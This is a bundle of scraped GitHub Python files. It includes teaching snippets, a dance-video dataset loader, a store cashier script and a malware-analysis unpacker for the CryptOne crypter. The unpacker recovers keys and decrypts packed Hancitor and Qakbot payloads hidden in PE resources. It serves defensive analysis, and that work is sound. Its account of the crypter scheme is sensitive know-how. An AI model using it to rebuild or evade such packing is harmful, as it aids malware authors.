# set\n\n# In[33]:\n\n\nempty_set = set()\nnumbers = set([1,2,3,4])\nhelp(set)\n\n\n# In[34]:\n\n\na = set([1,2,3])\nb = set([4,5,6])\na.union(b)\n\n\n# In[37]:\n\n\nfor x in a:\n print(x)\n\n\n# In[41]:\n\n\nnew_set = set(\"HiwidiTheOrder\")\n[x for x in new_set] # in general order is not preserved!\n\n\n# # tuple\n\n# In[43]:\n\n\nx = (1,)\ntype(x)\n\n\n# In[44]:\n\n\nhelp(tuple)\n\n\n# In[50]:\n\n\nx = (1,2,3,4,)\nx[0]\n\n\n# In[52]:\n\n\n# tuples are immutable\n\nx[0] = 3\n\n\n# # special containers\n# \n# ### OrderdDict\n\n# In[55]:\n\n\nimport collections\n\nspecial_collections = [ x for x in dir(collections) if x[0]!='_']\nprint(special_collections)\n\n\n# In[56]:\n\n\nhelp(collections.OrderedDict)\n\n\n# In[73]:\n\n\nregular_dict = {'one': 1, 'two': 2, 'three': 3, 'four': 4}\nordered_dict = collections.OrderedDict(one=1, two=2, three=3, four=4)\n\n[x for x in ordered_dict]\n[x for x in regular_dict]\n\n\n# In[75]:\n\n\nordered_dict.popitem()\n\n\n# In[76]:\n\n\nordered_dict\n\n","repo_name":"cfd113311/python595","sub_path":"lec02/basic_data_structures.py","file_name":"basic_data_structures.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"12569596255","text":"import re\n\nimport numpy as np\nimport torch\nfrom PIL import Image\n\nfrom config import *\nfrom dataset.tsv_cond_dataset import 
TsvCondImgCompositeDataset\n\n\nclass BaseDataset(TsvCondImgCompositeDataset):\n def __init__(self, args, yaml_file, split=\"train\", preprocesser=None):\n self.img_size = getattr(args, \"img_full_size\", args.img_size)\n self.basic_root_dir = BasicArgs.root_dir\n self.max_video_len = args.max_video_len\n assert self.max_video_len == 1\n self.fps = args.fps\n self.dataset = \"TiktokDance-Image\"\n self.preprocesser = preprocesser\n if not hasattr(args, \"ref_mode\"):\n args.ref_mode = \"first\"\n\n super().__init__(\n args, yaml_file, split=split, size_frame=args.max_video_len, tokzr=None\n )\n self.eval_sample_interval = args.eval_sample_interval\n self.train_sample_interval = args.train_sample_interval\n self.img_key_dict = {key: i for i, key in enumerate(self.image_keys)}\n self.data_dir = args.data_dir\n self.img_ratio = (\n (1.0, 1.0)\n if not hasattr(self.args, \"img_ratio\") or self.args.img_ratio is None\n else self.args.img_ratio\n )\n self.img_scale = (\n (1.0, 1.0)\n if not split == \"train\"\n else getattr(self.args, \"img_scale\", (0.9, 1.0))\n ) # val set should keep scale=1.0 to avoid the random crop\n print(\n f\"Current Data: {split}; Use image scale: {self.img_scale}; Use image ratio: {self.img_ratio}\"\n )\n\n self.transform = transforms.Compose(\n [\n transforms.RandomResizedCrop(\n self.img_size,\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BILINEAR,\n ),\n transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5]),\n ]\n )\n try:\n self.ref_transform = transforms.Compose(\n [ # follow CLIP transform\n transforms.ToTensor(),\n transforms.RandomResizedCrop(\n (224, 224),\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BICUBIC,\n antialias=False,\n ),\n transforms.Normalize(\n [0.48145466, 0.4578275, 0.40821073],\n [0.26862954, 0.26130258, 0.27577711],\n ),\n ]\n )\n self.ref_transform_mask = transforms.Compose(\n [ # follow CLIP transform\n transforms.RandomResizedCrop(\n (224, 224),\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BICUBIC,\n antialias=False,\n ),\n transforms.ToTensor(),\n ]\n )\n except:\n print(\"### Current pt version not support antialias, thus remove it! 
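The try/except above exists because older torchvision releases do not accept the antialias keyword on RandomResizedCrop. A version check is an alternative to catching the failure; a sketch under the assumption that torchvision's transforms module is what is in scope here:

import inspect
from torchvision import transforms

# Pass antialias only when this torchvision build actually supports it.
crop_params = inspect.signature(transforms.RandomResizedCrop.__init__).parameters
extra_kwargs = {"antialias": False} if "antialias" in crop_params else {}
ref_crop = transforms.RandomResizedCrop((224, 224), **extra_kwargs)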
###\")\n self.ref_transform = transforms.Compose(\n [ # follow CLIP transform\n transforms.ToTensor(),\n transforms.RandomResizedCrop(\n (224, 224),\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BICUBIC,\n ),\n transforms.Normalize(\n [0.48145466, 0.4578275, 0.40821073],\n [0.26862954, 0.26130258, 0.27577711],\n ),\n ]\n )\n self.ref_transform_mask = transforms.Compose(\n [ # follow CLIP transform\n transforms.RandomResizedCrop(\n (224, 224),\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BICUBIC,\n ),\n transforms.ToTensor(),\n ]\n )\n self.cond_transform = transforms.Compose(\n [\n transforms.RandomResizedCrop(\n self.img_size,\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BILINEAR,\n ),\n transforms.ToTensor(),\n ]\n )\n\n def add_mask_to_img(self, img, mask, img_key): # pil, pil\n if not img.size == mask.size:\n # import pdb; pdb.set_trace()\n # print(f'Reference image ({img_key}) size ({img.size}) is different from the mask size ({mask.size}), therefore try to resize the mask')\n mask = mask.resize(img.size) # resize the mask\n mask_array = np.array(mask)\n img_array = np.array(img)\n mask_array[mask_array < 127.5] = 0\n mask_array[mask_array > 127.5] = 1\n return Image.fromarray(img_array * mask_array), Image.fromarray(\n img_array * (1 - mask_array)\n ) # foreground, background\n\n def augmentation(self, frame, transform, state=None):\n if state is not None:\n torch.set_rng_state(state)\n return transform(frame)\n\n def _get_frame_idx_seq(self, start_img_key, nframes: int, frame_interval: int):\n format1 = r\"^(.*TiktokDance_\\d+_)(\\d+)(\\.\\w+)$\"\n format2 = r\"^(TiktokDance_\\d+_\\d+_1x1_)(\\d+)(\\.\\w+)$\"\n format3 = r\"^(.*_TiktokDance_[a-z0-9]+_\\d+_)(\\d+)(\\.\\w+)$\"\n format4 = r\"^(?!.*TiktokDance)([^_]+_)(\\d+)$\" # NTU dataset\n match1 = re.match(format1, start_img_key)\n match2 = re.match(format2, start_img_key)\n match3 = re.match(format3, start_img_key)\n match4 = re.match(format4, start_img_key)\n if match1:\n prefix, start_frame_idx, suffix = match1.groups()\n elif match2:\n prefix, start_frame_idx, suffix = match2.groups()\n elif match3:\n prefix, start_frame_idx, suffix = match3.groups()\n elif match4:\n prefix, start_frame_idx = match4.groups()\n suffix = \"\"\n else:\n raise IndexError(f\"failed to parse {start_img_key}\")\n\n start_frame_idx_int = int(start_frame_idx)\n img_idx_seq = []\n for i in range(nframes):\n frame_idx = str(start_frame_idx_int + i * frame_interval).zfill(\n len(start_frame_idx)\n )\n img_key = prefix + frame_idx + suffix\n if img_key not in self.img_key_dict:\n return False, None\n img_idx_seq.append(self.img_key_dict[img_key])\n return True, img_idx_seq\n\n def get_metadata(self, idx):\n while True:\n img_idx, cap_idx = self.get_image_cap_index(idx)\n status, frame_idx_seq = self._get_frame_idx_seq(\n self.image_keys[img_idx], self.args.nframes, self.args.frame_interval\n )\n if status:\n break\n idx -= 1\n\n frame_seq = []\n img_key_seq = []\n for frame_idx in frame_idx_seq:\n img_key = self.image_keys[frame_idx]\n frame, _ = self.get_visual_data(frame_idx)\n frame_seq.append(frame)\n img_key_seq.append(img_key)\n\n pose_img_seq = []\n for frame_idx in frame_idx_seq:\n pose_img = self.get_cond(frame_idx, \"poses\")\n pose_img_seq.append(pose_img)\n\n # preparing outputs\n meta_data = {}\n meta_data[\"img_seq\"] = frame_seq\n meta_data[\"img_key_seq\"] = img_key_seq\n meta_data[\"pose_img_seq\"] = 
pose_img_seq\n\n ref_img_idx = self.get_reference_frame_idx(img_idx)\n meta_data[\"ref_img_key\"] = self.image_keys[ref_img_idx]\n meta_data[\"ref_img\"], _ = self.get_visual_data(ref_img_idx)\n meta_data[\"ref_mask\"] = self.get_cond(ref_img_idx, \"masks\")\n meta_data[\"bg_ref_img_key\"] = meta_data[\"ref_img_key\"]\n meta_data[\"bg_ref_img\"] = meta_data[\"ref_img\"]\n meta_data[\"bg_ref_mask\"] = meta_data[\"ref_mask\"]\n\n return meta_data\n\n def get_reference_frame_idx(self, img_idx):\n def _get_first_frame_img_key(prefix, frame_idx, suffix):\n new_frame_idx = str(1).zfill(len(frame_idx))\n result = prefix + new_frame_idx + suffix\n if result in self.img_key_dict.keys():\n return result\n else:\n keys = [key for key in self.img_key_dict.keys() if prefix in key]\n keys = sorted(keys)\n return keys[0]\n\n img_key = self.image_keys[img_idx]\n format1 = r\"^(.*TiktokDance_\\d+_)(\\d+)(\\.\\w+)$\"\n format2 = r\"^(TiktokDance_\\d+_\\d+_1x1_)(\\d+)(\\.\\w+)$\"\n format3 = r\"^(.*_TiktokDance_[a-z0-9]+_\\d+_)(\\d+)(\\.\\w+)$\"\n format4 = r\"^(?!.*TiktokDance)([^_]+_)(\\d+)$\" # NTU dataset\n match1 = re.match(format1, img_key)\n match2 = re.match(format2, img_key)\n match3 = re.match(format3, img_key)\n match4 = re.match(format4, img_key)\n if match1:\n prefix, frame_idx, suffix = match1.groups()\n # print(f\"{img_key} matched to match1, {prefix}, {frame_idx}, {suffix}\")\n elif match2:\n prefix, frame_idx, suffix = match2.groups()\n # print(f\"{img_key} matched to match2, {prefix}, {frame_idx}, {suffix}\")\n elif match3:\n prefix, frame_idx, suffix = match3.groups()\n # print(f\"{img_key} matched to match3, {prefix}, {frame_idx}, {suffix}\")\n elif match4:\n prefix, frame_idx = match4.groups()\n suffix = \"\"\n # print(f\"{img_key} matched to match4, {prefix}, {frame_idx}\")\n else:\n print(\"failed to match the image key: \", img_key)\n return super().get_reference_frame_idx(img_idx)\n\n try:\n if self.args.ref_mode == \"first\" or self.split != \"train\":\n new_img_key = _get_first_frame_img_key(prefix, frame_idx, suffix)\n else:\n valid_img_keys = [x for x in self.img_key_dict.keys() if prefix in x]\n if self.args.ref_mode == \"random\":\n new_img_key = random.choice(valid_img_keys)\n elif self.args.ref_mode == \"random_sparse\":\n new_img_key = random.choice(valid_img_keys[::30])\n elif self.args.ref_mode == \"random_sparse_part\":\n if random.random() < 0.2:\n new_img_key = random.choice(valid_img_keys[::30])\n else:\n new_img_key = _get_first_frame_img_key(\n prefix, frame_idx, suffix\n )\n except:\n new_img_key = _get_first_frame_img_key(prefix, frame_idx, suffix)\n return self.img_key_dict[new_img_key]\n\n def get_visual_data(self, img_idx):\n try:\n row = self.get_row_from_tsv(self.visual_tsv, img_idx)\n return self.str2img(row[-1]), False\n except Exception as e:\n raise ValueError(f\"{e}, in get_visual_data()\")\n\n def __len__(self):\n if self.split == \"train\":\n if getattr(self.args, \"max_train_samples\", None):\n return min(self.args.max_train_samples, super().__len__())\n else:\n return int(super().__len__() // self.train_sample_interval)\n else:\n if getattr(self.args, \"max_eval_samples\", None):\n return min(self.args.max_eval_samples, super().__len__())\n else:\n return int(super().__len__() // self.eval_sample_interval)\n\n def __getitem__(self, idx):\n if self.split == \"train\":\n idx = int(idx * self.train_sample_interval)\n idx = idx + random.randint(0, self.train_sample_interval - 1)\n idx = min(idx, len(self) - 1)\n elif self.split == \"eval\":\n idx = 
int(idx * self.eval_sample_interval)\n\n raw_data = self.get_metadata(idx)\n img_seq = raw_data[\"img_seq\"]\n pose_img_seq = raw_data[\"pose_img_seq\"]\n fg_img = raw_data[\"ref_img\"]\n bg_img = raw_data[\"bg_ref_img\"]\n\n state = torch.get_rng_state()\n fg_state = state\n aug_img_seq = []\n for img in img_seq:\n img = self.augmentation(img, self.transform, state)\n aug_img_seq.append(img)\n aug_img_seq = torch.stack(aug_img_seq, dim=1)\n aug_pose_img_seq = []\n for pose_img in pose_img_seq:\n pose_img = self.augmentation(pose_img, self.cond_transform, state)\n aug_pose_img_seq.append(pose_img)\n aug_pose_img_seq = torch.stack(aug_pose_img_seq, dim=1)\n if getattr(self.args, \"refer_clip_preprocess\", None):\n raise NotImplementedError\n fg_img = self.preprocesser(fg_img).pixel_values[0] # use clip preprocess\n else:\n fg_img = self.augmentation(fg_img, self.ref_transform, fg_state)\n bg_img = self.augmentation(bg_img, self.transform, state)\n\n if self.args.combine_use_mask: # True\n ref_mask = raw_data[\"ref_mask\"]\n bg_ref_mask = raw_data[\"bg_ref_mask\"]\n assert not getattr(\n self.args, \"refer_clip_preprocess\", None\n ) # mask not support the CLIP process\n\n ### first resize mask to the img size\n ref_mask = ref_mask.resize(raw_data[\"ref_img\"].size)\n bg_ref_mask = bg_ref_mask.resize(raw_data[\"bg_ref_img\"].size)\n\n ref_mask = self.augmentation(ref_mask, self.ref_transform_mask, fg_state)\n bg_ref_mask = self.augmentation(\n bg_ref_mask, self.cond_transform, state\n ) # controlnet path input\n\n # apply the mask\n fg_img = fg_img * ref_mask # foreground\n bg_img = bg_img * (1 - bg_ref_mask) # background\n\n # caption = raw_data[\"caption\"]\n outputs = {\n \"img_key_seq\": \";\".join(raw_data[\"img_key_seq\"]),\n # \"input_text\": caption,\n \"label_img_seq\": aug_img_seq, # ground truth\n \"cond_img_seq\": aug_pose_img_seq, # pose\n \"reference_img\": fg_img, # foreground\n \"reference_img_controlnet\": bg_img, # background\n }\n\n return outputs\n","repo_name":"Wangt-CN/DisCo","sub_path":"dataset/tiktok_video_dataset.py","file_name":"tiktok_video_dataset.py","file_ext":"py","file_size_in_byte":14631,"program_lang":"python","lang":"en","doc_type":"code","stars":655,"dataset":"github-code","pt":"37"} +{"seq_id":"22127400191","text":"#!/usr/bin/env python3\nimport hashlib\nimport logging\nimport traceback\nimport os\nimport re\nimport sys\nimport pefile\nfrom binascii import hexlify, unhexlify\nfrom argparse import ArgumentParser\nfrom pathlib import Path\n\nrepo_root = Path(os.path.realpath(__file__)).parent.parent.absolute()\nlib = os.path.join(repo_root, 'lib')\nsys.path.append(lib)\nfrom utils import *\n\ndef parse_args():\n usage = \"unpack.py [OPTION]... [FILES]...\"\n arg_parser = ArgumentParser(description=usage)\n arg_parser.add_argument(\"-d\", \"--dump\", dest=\"dump_dir\", action=\"store\", default=None,\n help=\"Dump path for unpacked payloads\")\n arg_parser.add_argument('-v', '--verbose', action='count', default=0, \n help='Increase verbosity. 
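With action='count' each repeated -v increments an integer, which configure_logger below clamps into one of four logging levels; a small standalone demonstration:

import argparse
import logging

parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', action='count', default=0)
log_levels = {0: logging.ERROR, 1: logging.WARNING, 2: logging.INFO, 3: logging.DEBUG}
for argv in ([], ['-v'], ['-vvv'], ['-vvvvv']):
    count = parser.parse_args(argv).verbose
    level = log_levels[min(max(count, 0), 3)]  # -vvvvv still clamps to DEBUG
    print(argv, logging.getLevelName(level))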
Can specify multiple times for more verbose output')\n arg_parser.add_argument('-y', '--yara', action='store_true', default=False, \n help='Only unpack files matching the yara rule Classification_Resource_Crypter.yar')\n arg_parser.add_argument('files', nargs='+')\n return arg_parser.parse_args()\n\ndef configure_logger(log_level):\n log_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'unpacker.log')\n log_levels = {0: logging.ERROR, 1: logging.WARNING, 2: logging.INFO, 3: logging.DEBUG}\n log_level = min(max(log_level, 0), 3) #clamp to 0-3 inclusive\n logging.basicConfig(level=log_levels[log_level], \n format='%(asctime)s - %(name)s - %(levelname)-8s %(message)s',\n handlers=[\n logging.FileHandler(log_file, 'a'),\n logging.StreamHandler()\n ])\n\nclass Decryptor:\n\n def __init__(self, dump=None):\n self.logger = logging.getLogger('CryptOne Unpacker')\n self.unpacked_pe = None\n self.unpacked = None\n self.config = []\n self.c2s = []\n self.decrypted_strings = {}\n self.path = None\n self.unpacker = None\n self.potential_keys = []\n self.dump=dump\n \"\"\"\n 021D7AA0 | 8B15 60BC1D02 | mov edx,dword ptr ds:[] |\n 021D7AA6 | 81C2 8AA50800 | add edx,8A58A |\n 021D7AAC | 0315 4CBC1D02 | add edx,dword ptr ds:[] | 021DBC4C:\"ªl@\"\n \"\"\"\n self.regex = re.compile(b'\\x8B.(?P....)\\x81[\\xC0-\\xC3\\xC4-\\xC7](?P....)')\n\n def dump_path(self, data):\n fname = hashlib.md5(data).hexdigest()\n self.logger.debug(f'Beginning of file: {hexlify(data[:32]).decode()}')\n try:\n pe = pefile.PE(data=data)\n if pe.is_dll():\n fname += '.dll'\n elif pe.is_driver(): \n fname += '.sys'\n else:\n fname += '.exe'\n except:\n print(traceback.format_exc())\n\n exit()\n if self.data[:2] == b'\\xd0\\xcf':\n fname += '.ole'\n else:\n fname += '.bin'\n\n if not self.dump:\n #dump file back to path it originated from\n #print(os.path.basename(self.path))\n return os.path.join(os.path.dirname(self.path), fname)\n else:\n os.makedirs(self.dump, exist_ok=True)\n return os.path.join(self.dump, fname)\n\n def block_copy(self, data, bs, skip):\n result = bytearray()\n for i in range(len(data)//bs):\n #print(f'copying from {i*(bs+skip):X} to {i*(bs+skip)+bs:X}')\n result += data[i*(bs+skip):i*(bs+skip)+bs]\n return result\n \n \n def solve(self, ciphertext):\n # In all observed packed Hancitor and Qakbot samples so far, the plaintext begins with ~40 bytes of 0x24\n dword = int.from_bytes(ciphertext[0:4], byteorder='little')\n yield 0x24242424 ^ dword\n yield 0x50746547 ^ dword\n \n\n def decrypt(self, const, data):\n #make a copy\n result = data[:]\n for i in range(0, len(data), 4):\n x = int.from_bytes(result[i:i+4], byteorder='little', signed=False)\n x = ((x+i) & 0xFFFFFFFF)\n x ^= ((const+i) & 0xFFFFFFFF)\n result[i:i+4] = x.to_bytes(4, byteorder='little', signed=False)\n return result\n\n def decrypt_ciphertext(self, ciphertext, resource_name, bs=None, skip=None):\n \"\"\"\n Find the key for the provided ciphertext and attempt to decrypt it\n Dump to the configured path\n \"\"\"\n for const in self.solve(ciphertext):\n for match in self.regex.finditer(self.data):\n #self.logger.debug(f'Attempting to decrypt with add key 0x{const:08X}')\n unpacked_data = self.decrypt(const, ciphertext)\n #self.logger.debug(f'decrypted resource: {hexlify(unpacked_data[:0x176])}')\n results = carve(unpacked_data)\n if results:\n if bs:\n self.logger.critical(f'Successfully unpacked {len(results)} file(s) block size: 0x{bs:02X}, skip: 0x{skip:02X}, add: 0x{const:08X} from resource {resource_name}')\n else:\n 
self.logger.critical(f'Successfully carved {len(results)} file(s) with add 0x{const:08X}')\n for result in results:\n carved_pe = result['data'] \n self.unpacked_pe = pefile.PE(data=carved_pe, fast_load=False) \n self.unpacked = carved_pe\n dump_path = self.dump_path(carved_pe)\n with open(dump_path, 'wb') as fp:\n self.logger.critical(f'Dumping to {dump_path}')\n fp.write(carved_pe)\n return True\n\n\n def unpack(self, path, dump=None):\n self.path = path\n self.pe = pefile.PE(self.path, fast_load=False)\n with open(path, 'rb') as fp:\n self.data = fp.read()\n\n #Find resource\n\n for name, _id, resdata in iter_resources(self.pe):\n \"\"\"\n if (int.from_bytes(resdata[:4], byteorder='little') < len(resdata) and\n int.from_bytes(resdata[:4], byteorder='little') < len(resdata) + 0x200):\n \"\"\"\n resname = f'{name}/{_id}'\n reslength = len(resdata) - 4 #First dword is payload length, remove from size\n #self.logger.debug(f'Processing resource {name}/{_id} length: {len(resdata):08X}')\n size = int.from_bytes(resdata[:4], byteorder='little')\n try:\n ratio = size/len(resdata)\n except ZeroDivisionError:\n continue\n if size == reslength:\n self.logger.info(f'Found resource potentially containing encrypted PE: {name}/{_id}')\n return self.decrypt_ciphertext(resdata[4:], resname)\n elif ratio > .20 and ratio < 1:\n \"\"\"\n in some samples a58567fe17db5d4ee201dfeaa2466e06\n the resource is copied over in blocks ignoring a few bytes of dead space between blocks\n In this sample 0x7B bytes from the resource are copied, then 3 are skipped\n We can determine the ratio of copy/skip by comparing the resource's actual size to the size\n specified in the first 4 bytes\n \"\"\"\n for frac in nearest_fractions(reslength, size, max_fractions=100): # Only try the 100 best approximations\n block_size = frac.denominator\n skip = frac.numerator - block_size\n for i in range(1,255):\n if block_size*i > 0x100:\n break\n self.logger.debug(f'Trying block copy with block size 0x{block_size*i:02X} and skip 0x{skip*i:02X}')\n ciphertext = self.block_copy(resdata[4:], block_size*i, skip*i)\n if self.decrypt_ciphertext(ciphertext, resname, bs=block_size*i, skip=skip*i):\n return True\n else:\n pass\n #self.logger.debug(f'Skipping resource {name}/{_id}')\n \n self.logger.error(\"Failed to find resource containing encrypted PE file\")\n return \n \n\n # Find the addition key. 
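Because decrypt() reduces to plain = cipher ^ const at offset 0, the key falls out of the first ciphertext dword whenever the plaintext prefix is known, which is exactly what solve() exploits with 0x24242424. A self-contained round-trip check (the key value is arbitrary):

import struct

KEY = 0xDEADBEEF
plain = b'\x24' * 8  # packed payloads are observed to start with 0x24 bytes

# Inverse of Decryptor.decrypt: cipher = ((plain ^ (KEY + i)) - i) mod 2**32
cipher = bytearray()
for i in range(0, len(plain), 4):
    x = struct.unpack_from('<I', plain, i)[0] ^ ((KEY + i) & 0xFFFFFFFF)
    cipher += struct.pack('<I', (x - i) & 0xFFFFFFFF)

# Key recovery, exactly as solve() derives its first candidate:
recovered = 0x24242424 ^ struct.unpack_from('<I', cipher, 0)[0]
assert recovered == KEY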
Solving seems to be a better method as long as the 0x24242424 prefix is constant\n # If that fails to prove correct I may need build this method back in as a backup\n \"\"\"\n for match in self.regex.finditer(self.data):\n try:\n const1 = int.from_bytes(match.group('const'), byteorder='little')\n self.logger.debug(f'const1: 0x{const1:08X}')\n rva = int.from_bytes(match.group('offset'), byteorder='little')\n self.logger.debug(f'RVA: 0x{rva:08X}')\n raw_offset = self.pe.get_offset_from_rva(rva - self.pe.OPTIONAL_HEADER.ImageBase)\n self.logger.debug(f'raw offset: 0x{raw_offset:08X}')\n const2 = int.from_bytes(self.data[raw_offset:raw_offset+4], byteorder='little')\n self.logger.debug(f'const2: 0x{const2:08X}')\n except:\n continue\n \"\"\"\n\n \nif __name__ == '__main__':\n options = parse_args()\n configure_logger(options.verbose)\n decryptor = Decryptor(options.dump_dir)\n if options.yara:\n import yara\n rule_path = os.path.join(repo_root, 'CryptOne', 'Classification_CryptOne.yar')\n rule = yara.compile(rule_path)\n for arg in options.files:\n for path in recursive_all_files(arg):\n if options.yara:\n if not rule.match(path):\n decryptor.logger.info(f'Skipping {path} - did not match {rule_path}')\n continue\n decryptor.logger.critical(f'Processing {path}')\n try:\n decryptor.unpack(path)\n except Exception as e:\n print(f'Exception processing {path}:')\n print(traceback.format_exc())\n \n","repo_name":"jhumble/Unpackers-and-Config-Extractors","sub_path":"CryptOne/unpack.py","file_name":"unpack.py","file_ext":"py","file_size_in_byte":10141,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"6927877931","text":"for _ in range(int(input())):\n n = int(input())\n s = input()\n d = ''\n for i in range(1, 100):\n if i%3 == 0:\n d+='F'\n if i%5 ==0:\n d+='B'\n\n if s in d:\n print('YES')\n else:\n print('NO')\n","repo_name":"Raffian-moin/Codeforces-solutions","sub_path":"codeforces/800/string/1796A_typical_interview_problem.py","file_name":"1796A_typical_interview_problem.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2884205371","text":"#!/usr/bin/en PYTHON\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 11 15:28:18 2015\n\n@author: combo\n\"\"\"\n\nfrom lxml import etree\n\n\nxmlFile = etree.parse(\"annuaire.xml\")\nracine = etree.Element(\"annuaire\")\npersonne1 = etree.SubElement(racine, \"personne\")\npersonne1.set(\"dpmt\",\"sciences\")\nnom1 = etree.SubElement(personne1,\"nom\")\nnom1.text = \"dupond\"\n\nfile_str= etree.tostring(racine, pretty_print = True)\nfile_str = \"annuaire.xml\"\n\n","repo_name":"nCombo/Python","sub_path":"pythonAndXml/creatXmlFileWithLxml.py","file_name":"creatXmlFileWithLxml.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15308218010","text":"import datetime\nimport re\nimport os\nfrom gercliente import *\nfrom gerestoque import *\n\ndef Data():\n # Formata a data sempre que necessário\n data_input = str(input(\"Digite a data (dd/mm/aaaa): \"))\n if (data_input[2] == '/' or data_input[5] == '/'):\n # Verifica se a entrada é uma string numérica de 8 dígitos\n return data_input\n else:\n if not re.match(r'^\\d{8}$', data_input):\n print(\"Data inválida\")\n return Data()\n else:\n # Converte a string de entrada em um objeto datetime\n try:\n data = datetime.datetime.strptime(data_input, 
'%d%m%Y')\n except ValueError:\n print(\"Data inválida\")\n return Data()\n else:\n # Formata a data para o formato desejado\n return data.strftime('%d/%m/%Y')\n\ndef menu_caixa():\n from main import vendas\n from main import codigos\n os.system('cls' if os.name == 'nt' else 'clear')\n print(\"-----------------------------\")\n print(\"MENU CAIXA\")\n print(\"\\nEscolha a opção desejada:\")\n print(\"Cadastrar vendas (1)\")\n print(\"Gestão Financeira (2)\")\n print(\"-----------------------------\")\n opcao = int(input(\"O que deseja fazer? \"))\n os.system('cls' if os.name == 'nt' else 'clear')\n\n if opcao == 1:\n gestao_financeira(vendas)\n elif opcao == 2:\n cadastrar_vendas()\n\ndef gestao_financeira(vendas):\n os.system('cls' if os.name == 'nt' else 'clear')\n saldoCaixa = 0\n num_item = 0\n print(\"-----------------------------\")\n print(\"GERENCIAMENTO DE CAIXA\\n\")\n data_formatada = Data()\n saldo_inicial = float(input(\"Digite o saldo inicial do caixa: \"))\n\n if any(item[\"Data\"] == data_formatada for item in vendas):\n indice_item = next(i for i, item in enumerate(vendas) if item[\"Data\"] == data_formatada)\n cpfs_cadastrados = vendas[indice_item][\"CPFs cadastrados\"]\n print(\"A data já possui vendas cadastradas.\")\n else:\n cpfs_cadastrados = {}\n\n N = int(input(\"Digite o número total de vendas do dia: \"))\n print(\"-----------------------------\")\n tot_venda = 0\n som_item = 0\n\n for i in range(1, N + 1):\n cpf = input(\"Digite o CPF do cliente (ou 's' para sair): \")\n if cpf == 's':\n break\n\n while not validar_cpf(cpf):\n print(\"CPF inválido!\")\n cpf = input(\"Digite o CPF do cliente: \")\n\n if cpf not in cpfs_cadastrados:\n cpfs_cadastrados[cpf] = []\n\n while True:\n cod_item = input(\"Código do item: \")\n try:\n valor = str(cod_item)\n if verificar_soma(valor):\n print(\"A soma dos dígitos é válida.\")\n break\n else:\n print(\"A soma dos dígitos não está no intervalo desejado. Tente novamente.\")\n except ValueError:\n print(\"Entrada inválida. 
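verificar_soma is imported from gerestoque and not shown; judging from the prompts around it, it validates the digit sum of an item code against some interval. A hypothetical sketch, with bounds invented purely for illustration:

def verificar_soma(codigo, minimo=1, maximo=40):
    # Accept only numeric codes whose digit sum lies inside [minimo, maximo].
    if not codigo.isdigit():
        return False
    return minimo <= sum(int(d) for d in codigo) <= maximo

print(verificar_soma("12345"))  # digit sum 15 -> True under the assumed bounds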
Digite um valor inteiro.\")\n\n quant_item = int(input(\"Digite a quantidade de itens: \"))\n valor_un = float(input(\"Valor unitário do item em reais: \"))\n tot_venda += quant_item * valor_un\n som_item += quant_item\n num_item += quant_item\n cpfs_cadastrados[cpf].append({\n \"Código do item\": cod_item,\n \"Quantidade de itens\": quant_item,\n \"Valor unitário\": valor_un\n })\n print(\"-----------------------------\")\n\n print(\"-----------------------------\")\n print(\"RELATÓRIO DE MOVIMENTAÇÃO FINANCEIRA\")\n print(\"Data da movimentação:\", data_formatada)\n print(\"Saldo: R$\", saldo_inicial + tot_venda)\n print(\"Valor médio das vendas: R$\", tot_venda / som_item)\n print(\"Total das vendas:\", num_item, \"unidades\")\n print(\"-----------------------------\")\n vendas.append({\n \"Data\": data_formatada,\n \"CPFs cadastrados\": cpfs_cadastrados\n })\n print(\"CPFs cadastrados:\")\n for cpf, itens in cpfs_cadastrados.items():\n print(\"CPF:\", cpf)\n print(\"Itens:\")\n for item in itens:\n print(\" Código do item:\", item[\"Código do item\"])\n print(\" Quantidade de itens:\", item[\"Quantidade de itens\"])\n print(\" Valor unitário:\", item[\"Valor unitário\"])\n print(\"-----------------------------\")\n\n voltar = int(input(\"Teclar 0 para retornar à tela principal \"))\n if voltar != 0:\n print(\"Ação inválida\")\n voltar = int(input(\"Tecle 0 para voltar ao menu principal\"))\n else:\n from main import sisloja\n\ndef cadastrar_vendas():\n from main import vendas\n data_formatada = Data()\n indice_item = -1 # Inicialize a variável fora do loop\n\n for i, item in enumerate(vendas):\n if item[\"Data\"] == data_formatada:\n indice_item = i\n break \n\n if indice_item != -1:\n # Exibição do relatório de vendas\n print(\"CADASTRO DA VENDA\")\n print(\"Data da movimentação:\", vendas[indice_item][\"Data\"])\n cpfs_cadastrados = vendas[indice_item][\"CPFs cadastrados\"]\n print(\"CPFs cadastrados:\")\n for cpf, itens in cpfs_cadastrados.items():\n print(\"CPF:\", cpf)\n print(\"Itens:\")\n for item in itens:\n print(\" Código do item:\", item[\"Código do item\"])\n print(\" Quantidade de itens:\", item[\"Quantidade de itens\"])\n print(\" Valor unitário:\", item[\"Valor unitário\"])\n print(\"-----------------------------\")\n else:\n print(\"A data solicitada não está cadastrada ou não pode ser encontrada\")\n\n voltar = int(input(\"Teclar 0 para retornar à tela principal \"))\n if voltar != 0:\n print(\"Ação inválida\")\n voltar = int(input(\"Tecle 0 para voltar ao menu principal\"))\n else:\n from main import sisloja\n \n#Alex Euzebio (202301134358) TA\n#Emily Fernandes (@02303146681) TA\n#Erik Marcio Fernandes (202301135745) TA\n#Guilherme Duran Duran Gea (202302447171) TA\n#Maria Castello (202303180391) TA\n#Pedro Augusto Beserra da Silva (202304222223) 